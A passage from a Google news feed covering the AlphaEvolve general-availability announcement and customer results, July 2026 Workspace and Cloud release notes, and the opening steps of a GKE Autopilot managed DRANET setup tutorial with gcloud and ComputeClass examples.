&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://substrate.com/information-to-atoms" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how &lt;/span&gt;&lt;a href="https://substrate.com/information-to-atoms" rel="noopener" target="_blank"&gt;&lt;span style="vertical-align: baseline;"&gt;Substrate&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; applied AlphaEvolve to its computational lithography framework, achieving a multi-fold increase in runtime speed, enabling them to run significantly larger simulations of advanced semiconductors.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;WPP: Cracking the code of campaign success&lt;br /&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;"&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;WPP faced a ceiling in predicting creative campaign performance, as their manual model optimizations yielded only marginal 1% accuracy gains despite significant time and effort. To overcome this challenge, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;WPP’s Research team utilized AlphaEvolve&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; to autonomously propose, evaluate, and refine candidate model architectures rather than relying on slow manual experimentation. This agentic framework effectively bypassed their trial-and-error limits, successfully navigating complex, high-dimensional campaign data and class imbalances. As a result, WPP achieved a highly significant 5–10% (across different use cases) increase in both prediction accuracy and downstream recommendation scores, outperforming all previous baseline models including neural and fine-tuned Gemma models.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;" &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;— &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Anastasios Tsourtis, Lead Data Scientist, WPP.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Visit the &lt;/span&gt;&lt;a href="https://research.wpp.com/blog/cracking-the-code-of-campaign-success-with-googles-alphaevolve-agent" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to read more about how WPP used AlphaEvolve to optimize machine learning models for digital marketing campaigns, delivering a 10% lift in prediction accuracy and up to a 7% boost in downstream recommendation scores.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Hardening our own infrastructure and scientific research&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Beyond external deployments, Google has integrated AlphaEvolve as a core engine to scale its own state-of-the-art infrastructure. As &lt;/span&gt;&lt;a href="https://deepmind.google/blog/alphaevolve-impact/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;detailed by Google DeepMind&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, AlphaEvolve has successfully optimized the silicon design of next-generation Tensor Processing Units (TPUs) with a highly efficient, counterintuitive circuit layout, refined Google Spanner’s Log-Structured Merge-tree compaction heuristics to reduce write amplification by 20%, and reduced software storage footprints by nearly 9% through new compiler optimization strategies. Additionally, the agent has made critical contributions to scientific research, boosting predictive accuracy across 20 natural disaster risk categories by 5%, and discovering quantum circuits with 10x lower error rates for running complex molecular simulations on Google's Willow quantum processor.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;According to Pushmeet Kohli, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Chief Scientist, Google Cloud &amp;amp; Vice President, Science at Google DeepMind, “AI is moving beyond acting as a productivity assistant that accelerates how we work to a discovery engine that expands what we can achieve. By autonomously navigating complex computational search spaces, tools like AlphaEvolve are helping researchers and engineers uncover breakthrough algorithms that augment traditional human intuition”. &lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Start evolving your codebase today&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Getting started with AlphaEvolve requires only two core inputs on your end:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Seed program:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The initial algorithm written as code. You designate which segments of code are open to optimization and provide them to AlphaEvolve&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;An evaluator:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A deterministic client-side evaluation script that compiles, tests, and scores the mutated candidates, returning one or more scalar metrics for AlphaEvolve to maximize.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Your client-side runner queries the AlphaEvolve API to acquire mutated candidate solutions, runs them through your client-side evaluator (which can be running anywhere), and submits the scores back to AlphaEvolve which you sample from. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3-AE_animation" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3-AE_animation_8xMTiNr.gif" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To use AlphaEvolve we recommend getting going through the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/alphaevolve/developer-guide/overview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. After quickly setting up the AlphaEvolve API using the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/alphaevolve/developer-guide/get-started"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;onboarding guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, we recommend starting going through the &lt;/span&gt;&lt;a href="https://github.com/Google-Cloud-AI/alphaevolve-on-googlecloud" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;repository&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with the basic colab examples to understand how the AlphaEvolve heuristic works. For agentic workflows, you can easily get started using the AlphaEvolve Skill in your IDE of choice, such as Antigravity or Claude Code. For more complex experimentation, our &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/alphaevolve/developer-guide/best-practices"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;best practices guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and advanced examples provide additional resources to run through detailed AlphaEvolve experiment workflows.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/alphaevolve-is-available-for-everyone" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/alphaevolve-on-cloud</id>
    <title>We're rolling out AlphaEvolve widely to solve Google Cloud customers' hardest problems.</title>
    <updated>2026-07-09T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/1-Blog_hero_pic.max-600x600.format-webp.webp" /&gt;Finding the most efficient algorithm — whether designing a microchip, routing a logistics network or accelerating medical research — can be challenging, with many possib…</content>
    <link href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/alphaevolve-on-cloud" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/google-ads-ai-transparency-labels</id>
    <title>Expanding AI transparency in ads</title>
    <updated>2026-07-09T16:00:00+00:00</updated>
    <content type="html">Search windows</content>
    <link href="https://blog.google/products/ads-commerce/google-ads-ai-transparency-labels" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-09T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://research.google/blog/sensorfm-towards-a-general-intelligence-and-interface-for-wearable-health-data</id>
    <title>SensorFM: Towards a general intelligence and interface for wearable health data</title>
    <updated>2026-07-09T09:56:00+00:00</updated>
    <content type="html">Generative AI</content>
    <link href="https://research.google/blog/sensorfm-towards-a-general-intelligence-and-interface-for-wearable-health-data" rel="alternate"/>
    <category term="Google Research"/>
    <published>2026-07-09T09:56:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/technology/health/open-health-stack-software-foundation</id>
    <title>Building the future of global health, together</title>
    <updated>2026-07-09T08:00:00+00:00</updated>
    <content type="html">Collage of different pairs of people interacting</content>
    <link href="https://blog.google/innovation-and-ai/technology/health/open-health-stack-software-foundation" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-09T08:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#July_09_2026</id>
    <title>Workspace Release Notes — July 09, 2026</title>
    <updated>2026-07-09T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Chat API&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally Available&lt;/strong&gt;: You can now configure separate, granular access
permissions for discovering and joining a space in the &lt;a href="https://developers.google.com/workspace/chat/api/reference"&gt;Google Chat
API&lt;/a&gt;. To specify who
can discover or join a space, include the
&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/spaces#accesssettings"&gt;&lt;code&gt;AccessSettings&lt;/code&gt;&lt;/a&gt;
object in the
&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/spaces"&gt;&lt;code&gt;spaces&lt;/code&gt;&lt;/a&gt;
resource, and use the
&lt;a href="https://developers.google.com/workspace/chat/api/reference/rest/v1/spaces#accesspermissionsettings"&gt;&lt;code&gt;accessPermissionSettings&lt;/code&gt;&lt;/a&gt;
field to specify granular permissions.&lt;/p&gt;
&lt;p&gt;For more information, see the &lt;a href="https://developers.google.com/workspace/chat/space-target-audience"&gt;Target audience for the Spaces
resource&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Learn more in this Google Workspace Updates blog post: &lt;a href="https://workspaceupdates.googleblog.com/2026/06/discoverable-space-setting-chat.html"&gt;New discoverable space
setting in Google
Chat&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://developers.google.com/workspace/release-notes#July_09_2026" rel="alternate"/>
    <category term="Workspace Release Notes"/>
    <published>2026-07-09T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#July_09_2026</id>
    <title>Cloud Release Notes — July 09, 2026</title>
    <updated>2026-07-09T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Bigtable&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can use the &lt;a href="https://docs.cloud.google.com/bigtable/docs/reference/libraries"&gt;Bigtable client library for Go&lt;/a&gt;
to execute read jobs and queries using &lt;a href="https://docs.cloud.google.com/bigtable/docs/data-boost-overview"&gt;Data Boost&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Preview&lt;/strong&gt;: Advanced Compute Images provide high-performance images to support
your artificial intelligence (AI), machine learning (ML), and high-performance
computing (HPC) workloads on Google Cloud.&lt;/p&gt;
&lt;p&gt;Advanced Compute Images provide a single source of trusted, performance-tuned
OS images that remove the need for manual image building for specialized
workloads. Each image version is pre-installed with the necessary drivers,
network fabrics, and Slurm agents to help you run your workloads.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Gemini Enterprise&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Gemini Enterprise: AlphaEvolve algorithm optimization agent (GA)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The AlphaEvolve optimization service is generally available (GA) on the
Gemini Enterprise agent. AlphaEvolve is a code optimization
and discovery agent built on top of Gemini that helps solve the hardest algorithmic
problems for your business and research. It combines creative, server-side
LLM exploration with secure client-side code execution to autonomously
discover new, optimized solutions that surpass human-designed
baselines.&lt;/p&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;span&gt; AlphaEvolve does not support FedRAMP or DoD compliance
requirements. Access for environments requiring these standards is restricted
by default but can be requested through your account team.&lt;/span&gt;&lt;/aside&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/alphaevolve/developer-guide/overview"&gt;AlphaEvolve documentation&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#July_09_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-07-09T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/developers-practitioners/autopilot-clusters-with-gke-managed-dranet-gpus-and-tpus</id>
    <title>Autopilot Clusters with GKE managed DRANET: GPUs and TPUs</title>
    <updated>2026-07-09T07:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Kubernetes Engine &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;(GKE) managed DRANET&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; supports both GPUs and TPUs. There are several configurations to use this implementation, including &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/choose-cluster-mode" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;standard cluster&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (where you have full control) and &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;autopilot cluster &lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;(where Google does the heavy configs for you). I've been exploring the capabilities and in this blog we will explore setting up for autopilot clusters.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Autopilot and managed DRANET&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GKE autopilot is a managed version of GKE that handles &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;nodes, scaling, security, and other preconfigured settings. GKE managed&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; DRANET lets you request and allocate networking resources for your Pods, including network interfaces that support TPUs and Remote Direct Memory Access (RDMA).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #5f6368;"&gt;Setup flow&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To deploy your GKE autopilot cluster and enable managed DRANET, you need to create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/vpc/docs/create-modify-vpc-networks#create-custom-network" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Virtual Private Cloud (VPC)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Let's walk through the setup:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy an Autopilot cluster.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a custom &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/reference/crds/computeclass#computeclass_specification" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ComputeClass&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; which supports the accelerator type (TPU or GPU)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/about-dynamic-resource-allocation#resourceclaim-vs-resourceclaimtemplate" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ResourceClaimTemplate&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for GPUs (RDMA) or non-GPU (TPU)&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy workload and reference the ComputeClass and ResourceClaimTemplate to get the correct networking set up.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Now let's explore the configs for both TPU and GPU.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Configure variables:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;export PROJECT_ID=$(gcloud config get project) #automatically sets your Project_ID\r\nexport REGION=&amp;quot;REGION&amp;quot;\r\nexport CLUSTER_NAME=&amp;quot;CLUSTER_NAME&amp;quot;\r\nexport NETWORK=&amp;quot;NETWORK&amp;quot;\r\nexport SUBNETWORK=&amp;quot;SUBNETWORK&amp;quot;\r\nexport RESERVATION_URL=&amp;quot;RESERVATION_URL&amp;quot;\r\nexport HF_TOKEN=&amp;quot;HUGGING_FACE_TOKEN&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4f40&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Replace the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;REGION&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The region where you want to create your cluster, such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;us-east1&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;. You can only create the cluster in the region where your reservation or resources exists.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;CLUSTER_NAME&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: A name for your cluster, such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;dranet-cluster&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;NETWORK&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The name of the VPC network.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SUBNETWORK&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The name of the subnet in the VPC.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;RESERVATION_URL&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: The URL of the reservation that you want to use to create your resources.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;HUGGING_FACE_TOKEN&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;The Hugging Face access token to download your model.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #5f6368;"&gt;1. Deploy an Autopilot cluster&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy an &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/creating-an-autopilot-cluster#set-version" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Autopilot cluster&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud container clusters create-auto $CLUSTER_NAME \\\r\n    --project=$PROJECT_ID \\\r\n    --region=$REGION \\\r\n    --release-channel=rapid \\\r\n    --network=$NETWORK \\\r\n    --subnetwork=$SUBNETWORK&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4be0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #5f6368;"&gt;2. Create a custom ComputeClass&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example: GPU B200 &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;custom &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#autopilot-nap" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ComputeClass&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; with managed DRANET support and a reservation.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: cloud.google.com/v1\r\nkind: ComputeClass\r\nmetadata:\r\n  name: dranet-a4-computeclass\r\nspec:\r\n  nodePoolAutoCreation:\r\n    enabled: true\r\n  nodePoolConfig:\r\n    dra:\r\n      networking:\r\n        enabled: true\r\n  priorities:\r\n  - machineType: a4-highgpu-8g\r\n    gpu:\r\n      count: 8\r\n      type: nvidia-b200\r\n    acceleratorNetworkProfile: auto\r\n    reservations:\r\n      affinity: Specific\r\n      specific:\r\n        - name: ${RESERVATION_URL}\r\n          project: ${PROJECT_ID}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4730&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Replace the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;${RESERVATION} : With the URL of the reservation that you want to use to create your resources.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;${PROJECT_ID}: With the ID of the project you are using.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Alternatively you can set the variables in your terminal and use the following command to pass the variables at creation&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt; envsubst &amp;lt; filename.yaml | kubectl apply -f -&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Example: TPU v6e &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;custom ComputeClass using on-demand example.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: cloud.google.com/v1\r\nkind: ComputeClass\r\nmetadata:\r\n  name: dra-gke-auto\r\nspec:\r\n  nodePoolAutoCreation:\r\n    enabled: true\r\n  nodePoolConfig:\r\n    dra:\r\n      networking:\r\n        enabled: true\r\n  priorities:\r\n  - tpu:\r\n      type: tpu-v6e-slice\r\n      count: 8\r\n      topology: &amp;quot;2x4&amp;quot; \r\n    acceleratorNetworkProfile: auto\r\n    location:\r\n      zones: \r\n      - us-east5-b&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f5b4a3a4ca0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #5f6368;"&gt;3. Create a ResourceClaimTemplate&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/how-to/allocate-network-resources-dra#deploy-workload-rdma" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;RDMA support&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;deviceClassName: mrdma.google.com&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; ResourceClaimTemplate example for GPUs: &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
